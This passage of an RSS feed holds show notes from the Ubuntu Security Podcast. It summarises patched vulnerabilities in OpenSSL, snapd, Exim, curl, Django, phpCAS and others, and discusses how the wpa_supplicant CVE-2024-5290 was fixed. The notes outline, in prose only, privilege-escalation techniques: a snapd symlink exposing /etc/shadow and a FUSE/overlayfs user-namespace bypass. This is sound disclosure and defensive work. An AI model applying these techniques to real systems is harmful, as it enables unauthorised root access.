<li><a href="https://ubuntu.com/security/CVE-2024-26818">CVE-2024-26818</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26733">CVE-2024-26733</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26688">CVE-2024-26688</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52643">CVE-2023-52643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26703">CVE-2024-26703</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26831">CVE-2024-26831</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26789">CVE-2024-26789</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26662">CVE-2024-26662</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26663">CVE-2024-26663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26708">CVE-2024-26708</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26659">CVE-2024-26659</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26684">CVE-2024-26684</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52638">CVE-2023-52638</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24861">CVE-2024-24861</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23307">CVE-2024-23307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1151">CVE-2024-1151</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0841">CVE-2024-0841</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6270">CVE-2023-6270</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.5 OEM</li>
</ul>
<h3 id="usn-6937-1-openssl-vulnerabilities--03-04">[<a href="https://ubuntu.com/security/notices/USN-6937-1">USN-6937-1</a>] OpenSSL vulnerabilities (03:04)</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-5535">CVE-2024-5535</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4741">CVE-2024-4741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4603">CVE-2024-4603</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2511">CVE-2024-2511</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Four low priority issues
<ul>
<li>Possible UAF in <code>SSL_free_buffers</code> API - requires an application to directly
call this function - across the entire Ubuntu package ecosystem there
doesn&rsquo;t appear to be any packages that do this so highly unlikely to be an
issue in practice</li>
<li>Similarly, in another rarely used function <code>SSL_select_next_proto</code> - if called
with an empty buffer list would read other private memory - ie OOB read -
and potentially then either crash or return private data
<ul>
<li>but again this is not expected to occur in practice</li>
</ul>
</li>
<li>CPU-based DoS when validating long / crafted DSA keys
<ul>
<li>simply check if using to large a modulus and error in that case</li>
</ul>
</li>
<li>If had set the <code>SSL_OP_NO_TICKET</code> option would possibly get into a state where
the session cache would not be flushed and so would grow unbounded - memory
based DoS</li>
</ul>
</li>
</ul>
<h3 id="usn-6913-2-phpcas-vulnerability--04-51">[<a href="https://ubuntu.com/security/notices/USN-6913-2">USN-6913-2</a>] phpCAS vulnerability (04:51)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-39369">CVE-2022-39369</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-233/#usn-6913-1-phpcas-vulnerability--02-26">[USN-6913-1] phpCAS vulnerability from Episode 233</a></li>
</ul>
<h3 id="usn-6936-1-apache-commons-collections-vulnerability--05-03">[<a href="https://ubuntu.com/security/notices/USN-6936-1">USN-6936-1</a>] Apache Commons Collections vulnerability (05:03)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2015-4852">CVE-2015-4852</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Unsafe deserialisation - could allow to overwrite an object with an attacker
controlled version containing code to be executed - RCE</li>
</ul>
<h3 id="usn-6939-1-exim-vulnerability--05-31">[<a href="https://ubuntu.com/security/notices/USN-6939-1">USN-6939-1</a>] Exim vulnerability (05:31)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-39929">CVE-2024-39929</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Mishandles multiline filename header and so a crafted value could bypass the
MIME type extension blocking mechanism - allowing executables etc to be
delivered to users</li>
</ul>
<h3 id="usn-6933-1-clickhouse-vulnerabilities--06-00">[<a href="https://ubuntu.com/security/notices/USN-6933-1">USN-6933-1</a>] ClickHouse vulnerabilities (06:00)</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42388">CVE-2021-42388</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43305">CVE-2021-43305</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43304">CVE-2021-43304</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42387">CVE-2021-42387</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>real-time analytics DBMS</li>
<li>Mostly written in C++ so not surprisingly has various memory safety issues
<ul>
<li>All in the the LZ4 compression codec - uses an attacker controlled 16-bit
unsiged value as the offset to read from the compressed data - then this
value is also used when copying the data but there is no check on the upper
bound so could index outside of the data</li>
<li>Also a heap buffer overflow during this same data copy since doesn&rsquo;t verify
the size of the destination either</li>
</ul>
</li>
</ul>
<h3 id="usn-6940-1-snapd-vulnerabilities--06-55">[<a href="https://ubuntu.com/security/notices/USN-6940-1">USN-6940-1</a>] snapd vulnerabilities (06:55)</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-29069">CVE-2024-29069</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-29068">CVE-2024-29068</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1724">CVE-2024-1724</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 quite similar issues discovered by one of the engineers on the snapd team - Zeyad Gouda
<ul>
<li>snaps are squashfs images - in general they are just mounted but certain
files from the squashfs get extracted by snapd and placed on the regular
file-system (ie. desktop files and icons for launchers etc) - as such, snapd
would read the contents of these files and then write them out - if the file
was actually a named pipe, snapd would block forever - DoS</li>
<li>similarly, if the file was a symlink that pointed to an existing file on the
file-system, when opening that file (which is a symlink) snapd would read
the contents of the other file and write it out - recall these are desktop
files etc so they get written to <code>/usr/share/applications</code> which is
world-readable - so if the symlink pointed to <code>/etc/shadow</code> then you would get
a copy of this written out as world-readable - so an unprivileged user on
the system could then possibly escalate their privileges</li>
</ul>
</li>
<li>3rd issue was AppArmor sandbox
<ul>
<li>home interface allows snaps to read/write to your home directory</li>
<li>On Ubuntu, if the bin directory exists, it gets automatically added to your PATH</li>
<li>AppArmor policy for snapd took this into account and would stop snaps from
writing files into this directory (and hence say creating a shell script
that you would then execute later, outside of the snap sandbox)</li>
<li>BUT it did not prevent a snap from <strong>creating</strong> this directory if it didn&rsquo;t
already exist</li>
</ul>
</li>
</ul>
<h3 id="usn-6941-1-python-vulnerability--11-15">[<a href="https://ubuntu.com/security/notices/USN-6941-1">USN-6941-1</a>] Python vulnerability (11:15)</h3>
<ul>
<li>1 CVEs addressed in Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-4032">CVE-2024-4032</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-233/#usn-6928-1-python-vulnerabilities--05-49">[USN-6928-1] Python vulnerabilities from Episode 233</a></li>
</ul>
<h3 id="usn-6909-2-bind-vulnerabilities--11-30">[<a href="https://ubuntu.com/security/notices/USN-6909-2">USN-6909-2</a>] Bind vulnerabilities (11:30)</h3>
<ul>
<li>2 CVEs addressed in Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-1975">CVE-2024-1975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1737">CVE-2024-1737</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different CPU-based DoS
<ul>
<li>Didn&rsquo;t restrict the number of resource records
for a given hostname - if an attacker could arrange so a large number of RRs
then could degrade the performace of bind due to it having to perform
expensive lookups across all the records
<ul>
<li>introduce a limit of 100 RRs for a given name</li>
</ul>
</li>
<li>Removed support DNSSEC SIG(0) transaction signatures since they could be
abused to perform a CPU-based DoS</li>
</ul>
</li>
</ul>
<h3 id="usn-6943-1-tomcat-vulnerabilities--12-26">[<a href="https://ubuntu.com/security/notices/USN-6943-1">USN-6943-1</a>] Tomcat vulnerabilities (12:26)</h3>
<ul>
<li>5 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29885">CVE-2022-29885</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23181">CVE-2022-23181</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41079">CVE-2021-41079</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-25122">CVE-2021-25122</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9484">CVE-2020-9484</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6942-1-gross-vulnerability--12-33">[<a href="https://ubuntu.com/security/notices/USN-6942-1">USN-6942-1</a>] Gross vulnerability (12:33)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52159">CVE-2023-52159</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>greylisting server used in MTA setup to minimise spam - uses DNS block lists
to tag mails which come from these domains as possible spam</li>
<li>stack buffer overflow through the use of <code>strncat()</code> during logging
<ul>
<li>would concatenate a list of parameters as string into a fixed size buffer on
the stack but would pass the entire buffer size as the length argument
rather than accounting for the remaining space in the buffer</li>
<li>as these parameters can be controlled by an attacker can be used to either
crash grossd or get RCE</li>
</ul>
</li>
</ul>
<h3 id="usn-6944-1-curl-vulnerability--13-55">[<a href="https://ubuntu.com/security/notices/USN-6944-1">USN-6944-1</a>] curl vulnerability (13:55)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-7264">CVE-2024-7264</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible OOB read through crafted ASN.1 Generalized Time field when parsing TLS certificate chain - would
potentially use a negative length value and hence try calculate the length of
a string but pointing to the wrong memory region - crash / info leak</li>
<li>Need to specifically use the <a href="https://curl.se/libcurl/c/CURLINFO_CERTINFO.html">https://curl.se/libcurl/c/CURLINFO_CERTINFO.html</a>
option though to be vulnerable</li>
</ul>
<h3 id="usn-6200-2-imagemagick-vulnerabilities--14-52">[<a href="https://ubuntu.com/security/notices/USN-6200-2">USN-6200-2</a>] ImageMagick vulnerabilities (14:52)</h3>
<ul>
<li>20 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-34151">CVE-2023-34151</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3195">CVE-2023-3195</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1289">CVE-2023-1289</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3428">CVE-2023-3428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1906">CVE-2023-1906</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3610">CVE-2021-3610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32547">CVE-2022-32547</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32546">CVE-2022-32546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32545">CVE-2022-32545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28463">CVE-2022-28463</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39212">CVE-2021-39212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20313">CVE-2021-20313</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20312">CVE-2021-20312</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20246">CVE-2021-20246</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20309">CVE-2021-20309</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20244">CVE-2021-20244</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20243">CVE-2021-20243</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20241">CVE-2021-20241</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20224">CVE-2021-20224</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29599">CVE-2020-29599</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-202/#usn-6200-1-imagemagick-vulnerabilities--11-27">[USN-6200-1] ImageMagick vulnerabilities from Episode 202</a></li>
</ul>
<h3 id="usn-6946-1-django-vulnerabilities--15-04">[<a href="https://ubuntu.com/security/notices/USN-6946-1">USN-6946-1</a>] Django vulnerabilities (15:04)</h3>
<ul>
<li>4 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-42005">CVE-2024-42005</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-41991">CVE-2024-41991</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-41990">CVE-2024-41990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-41989">CVE-2024-41989</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>SQL injection via crafted JSON in methods on the QuerySet class, and various
DoS - one via very large inputs of Unicode characters in certain input fields,
another through floatformat template filter - would use a large amount of
memory if given a number in scientific notation with a large exponent</li>
</ul>
<h3 id="usn-6945-1-wpa-supplicant-and-hostapd-vulnerability--15-42">[<a href="https://ubuntu.com/security/notices/USN-6945-1">USN-6945-1</a>] wpa_supplicant and hostapd vulnerability (15:42)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-5290">CVE-2024-5290</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible privilege escalation through abuse of DBus method to get
<code>wpa_supplicant</code> to load an attacker controlled shared object into memory</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="discussion-of-cve-2024-5290-in-wpa-supplicant--16-10">Discussion of <a href="https://ubuntu.com/security/CVE-2024-5290">CVE-2024-5290</a> in <code>wpa_supplicant</code> (16:10)</h3>
<ul>
<li>Reported privately to us by Rory McNamara from Snyk as part of a larger
disclosure of various security issues they had found</li>
<li>Issue specific to Debian and Ubuntu - includes patch to the dbus policy for
<code>wpa_supplicant</code> to allow various methods to be called by users in the netdev
group
<ul>
<li>historical hangover before we had network manager etc to do this</li>
<li>nowadays, Network Manager allows the user who is logged in to control access to wireless networks etc</li>
<li>historically though, Debian had the netdev group instead - so you would add
your user to this group to allow them to configure network settings etc</li>
<li>so makes sense to allow that group to control <code>wpa_supplicant</code> via its dbus interface</li>
</ul>
</li>
<li><a href="https://w1.fi/wpa_supplicant/devel/dbus.html">DBus API</a> includes a method called <code>CreateInterface</code>
<ul>
<li>takes an argument called <code>ConfigFile</code> which specifies the path to a configuration file using the format of <a href="https://manpages.ubuntu.com/manpages/noble/man5/wpa_supplicant.conf.5.html">wpa_supplicant.conf</a></li>
<li>config file includes a parameter for <a href="https://w1.fi/cgit/hostap/tree/wpa_supplicant/wpa_supplicant.conf#n177"><code>opensc_engine_path</code></a> or similarly PKCS11 engine and module paths</li>
<li>these are shared object which then get dynamically loaded into memory by <code>wpa_supplicant</code></li>
</ul>
</li>
<li>hence could overwrite existing functions and therefore get code execution <strong>as
root</strong> - since <code>wpa_supplicant</code> runs as root</li>
<li>upstream actually includes a patch to hard-code these values at compile-time
and not allow them to be specified in the config file BUT we don&rsquo;t use this in
Ubuntu since it was only introduced recently (so not all Ubuntu releases
include it) but regardless, we want to support setups where these modules may
live in different locations</li>
<li>Discussed how to possibly fix this in <a href="https://bugs.launchpad.net/ubuntu/+source/wpa/+bug/2067613">LP: #2067613</a>
<ul>
<li>Is not an issue for upstream since the upstream policy only allows root to
use this dbus method so there is no privilege escalation</li>
<li>Could allow-list various paths but was not clear which ones to use
<ul>
<li><a href="https://launchpad.net/~slyon">Lukas</a> from Foundations team (and maintainer of Netplan) tried searching
for any users of these config parameters but couldn&rsquo;t find anything in the
archive</li>
<li>However, users may still be configuring things so don&rsquo;t want to break
their setups</li>
</ul>
</li>
<li>Or could tighten up the DBus policy for the netdev group to NOT include
access to this method - but this may break existing things that are using
the netdev group and this method
<ul>
<li><a href="https://launchpad.net/~mdeslaur">Marc</a> from our team then tried looking for anything in Ubuntu which used
the <code>wpa_supplicant</code> DBus interface - none appear to make use of the netdev
group</li>
<li>Considered dropping support entirely for this feature which allows the
netdev group access since in general this should be done with
NetworkManager or netplan nowadays anyway</li>
<li>But this is such a long-standing piece of functionality it wasn&rsquo;t clear
what the possible regression potential would be</li>
</ul>
</li>
<li>Or we could patch <code>wpa_supplicant</code> to check that the specified module was
owned by root - this should then stop an unprivileged user from creating
their own module and specifying it as it wouldn&rsquo;t be owned by root
<ul>
<li>This looked promising and a patch was drafted and tested against the
proof-of-concept and was able to block it</li>
<li>However, Rory came back with some excellent research showing it could be
bypassed by some quite creative use of a crafted FUSE filesystem in
combination with overlayfs inside an unprivileged user namespace
(ie. unpriv userns strikes again)
<ul>
<li>create a FUSE which lies about the uid of a file to say it is 0 (root)</li>
<li>mount this as an unprivileged user</li>
<li>create a new user and mount namespace through unshare</li>
<li>within that (since you are &ldquo;root&rdquo;) mount an overlay filesystem using the FUSE fs</li>
<li>Specify the path to this file using the special <code>root</code> link inside the
proc filesystem - which points to the actual root directory of that
process - and since the FUSE fs lies about the UID it looks like root
owned</li>
</ul>
</li>
</ul>
</li>
<li>So at this point we were running out of ideas - <a href="https://launchpad.net/~lucistanescu">Luci</a> from our team suggested
manually walking the path to the specified file akin to how <code>realpath</code> works
(which should block the ability to read it via the proc symlink)
<ul>
<li>but this was considered too complicated and possibly prone to a TOCTOU
race</li>
</ul>
</li>
<li>Finally Marc proposed to simply allow-list anything under <code>/usr/lib</code> - since
anything installed from the archive would live here - in this case we simply
call <code>realpath()</code> directly on the provided path name and if it doesn&rsquo;t start
with /usr/lib then deny loading of the module</li>
<li>No way to race against this and would seem to have the least chance of regression
<ul>
<li>Yes if using a non-standard location like <code>/opt</code> would now fail BUT if you
can write to <code>/opt</code> then you can write to somewhere in <code>/usr/lib</code> - so is easy
to fix as well</li>
</ul>
</li>
<li>Was tested significantly both with a dummy PKCS11 provider as well as a real
one to ensure works as expected (both to prevent the exploit but also to
work as intended)</li>
</ul>
</li>
<li>Eventual solution then was both secure but also would appear to minimise the
chance of regressions
<ul>
<li>None reported so far anyway ;)</li>
</ul>
</li>
<li>Demonstrates the careful balance between security and possible regressions</li>
<li>Also the team effort of both the security team and other Ubuntu teams
<ul>
<li>Thanks to Marc, Luci, Mark E, and Sudhakar on our side, and Lukas from
Foundations, but most importantly to Rory from Snyk for both reporting the
vuln but also in their help evaluating the various proposed solutions</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E234.mp3" length="29004202" type="audio/mpeg" /><itunes:duration>1751</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 233
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-233/</link>
          <pubDate>Fri, 02 Aug 2024 17:05:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>ba8f315e6aff94fd8f0f481fef53b3cb064a5383e1e2673a7dfe3998fdf2d50476f22f2050b82f7f7f6ab8a51ce3a7ceebef1739cce5b8a2f341c5cdab896d7e</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 233</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we take a look at the recent Crowdstrike outage and what we can learn
  from it compared to the testing and release process for security updates in
  Ubuntu, plus we cover details of vulnerabilities in poppler, phpCAS, EDK II,...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we take a look at the recent Crowdstrike outage and what we can learn
  from it compared to the testing and release process for security updates in
  Ubuntu, plus we cover details of vulnerabilities in poppler, phpCAS, EDK II,
  Python, OpenJDK and one package with over 300 CVE fixes in a single update.
  </itunes:summary>
        <description>  This week we take a look at the recent Crowdstrike outage and what we can learn
  from it compared to the testing and release process for security updates in
  Ubuntu, plus we cover details of vulnerabilities in poppler, phpCAS, EDK II,
  Python, OpenJDK and one package with over 300 CVE fixes in a single update.
  </description>
        <googleplay:description>  This week we take a look at the recent Crowdstrike outage and what we can learn
  from it compared to the testing and release process for security updates in
  Ubuntu, plus we cover details of vulnerabilities in poppler, phpCAS, EDK II,
  Python, OpenJDK and one package with over 300 CVE fixes in a single update.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we take a look at the recent Crowdstrike outage and what we can learn
from it compared to the testing and release process for security updates in
Ubuntu, plus we cover details of vulnerabilities in poppler, phpCAS, EDK II,
Python, OpenJDK and one package with over 300 CVE fixes in a single update.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>462 unique CVEs addressed</p>
<h3 id="usn-6915-1-poppler-vulnerability--01-35">[<a href="https://ubuntu.com/security/notices/USN-6915-1">USN-6915-1</a>] poppler vulnerability (01:35)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-6239">CVE-2024-6239</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Installed by default in Ubuntu due to use by cups</li>
<li>PDF document format describes a Catalog which has a tree of destinations -
essentially hyperlinks within the document. These can be either a page number
etc or a named location within the document. If open a crafted document with a
missing name property for a destination - name would then be NULL and would
trigger a NULL ptr deref -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-6913-1-phpcas-vulnerability--02-26">[<a href="https://ubuntu.com/security/notices/USN-6913-1">USN-6913-1</a>] phpCAS vulnerability (02:26)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-39369">CVE-2022-39369</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Authentication library for PHP to allow PHP applications to authenticates
users against a Central Authentication Server (ie. SSO).</li>
<li>When used for SSO, a client who is trying to use a web application gets
directed to the CAS. The CAS then authenticates the user and returns a service
ticket - the client then needs to validate this ticket with the CAS since it
could have possibly been injected via the application. To do this, pass the
ticket along with its own service identifier to CAS - and if this succeeds is
provided with the details of which user was authenticated etc.</li>
<li>For clients, previously would use HTTP headers to determine where the CAS
server was to authenticate the ticket. Since these can be manipulated by a
malicious application, could essentially redirect the client to send the
ticket to the attacker who could then use that to impersonate the client and
login as the user.</li>
<li>Fix requires a refactor to include an additional API parameter which specifies
either a fixed CAS server for the client to use, or a mechanism to
auto-discover this in a secure way - either way, applications using phpCAS now
need to be updated.</li>
</ul>
<h3 id="usn-6914-1-ocs-inventory-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6914-1">USN-6914-1</a>] OCS Inventory vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-39369">CVE-2022-39369</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Same as above since has an embedded copy of phpCAS</li>
</ul>
<h3 id="usn-6916-1-lua-vulnerabilities--04-44">[<a href="https://ubuntu.com/security/notices/USN-6916-1">USN-6916-1</a>] Lua vulnerabilities (04:44)</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-33099">CVE-2022-33099</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28805">CVE-2022-28805</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer over-read and a possible heap buffer over-flow via recursive error
handling - looks like both require to be interpreting malicious code</li>
</ul>
<h3 id="usn-6920-1-edk-ii-vulnerabilities--05-04">[<a href="https://ubuntu.com/security/notices/USN-6920-1">USN-6920-1</a>] EDK II vulnerabilities (05:04)</h3>
<ul>
<li>5 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-0160">CVE-2019-0160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3613">CVE-2018-3613</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12183">CVE-2018-12183</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12182">CVE-2018-12182</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-5731">CVE-2017-5731</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UEFI firmware implementation in qemu etc</li>
<li>Various missing bounds checks -&gt; stack and heap buffer overflows -&gt; DoS or
code execution in BIOS context -&gt; privilege escalation within VM</li>
</ul>
<h3 id="usn-6928-1-python-vulnerabilities--05-49">[<a href="https://ubuntu.com/security/notices/USN-6928-1">USN-6928-1</a>] Python vulnerabilities (05:49)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-4032">CVE-2024-4032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0397">CVE-2024-0397</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Memory race in the ssl module - can call into various functions to get
certificate information at the same time as certs are loaded if happening to
be doing a TLS handshake with a certificate directory configured - all via
different threads. Python would then possibly return inconsistent results
leading to various issues</li>
<li>Occurs since ssl module is implemented in C to interface with openssl and did
not properly lock access to the certificate store</li>
</ul>
<h3 id="usn-6929-1-usn-6930-1-openjdk-8-and-openjdk-11-vulnerabilities--06-52">[<a href="https://ubuntu.com/security/notices/USN-6929-1">USN-6929-1</a>, <a href="https://ubuntu.com/security/notices/USN-6930-1">USN-6930-1</a>] OpenJDK 8 and OpenJDK 11 vulnerabilities (06:52)</h3>
<ul>
<li>6 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-21147">CVE-2024-21147</a> <!-- raw HTML omitted --></li>
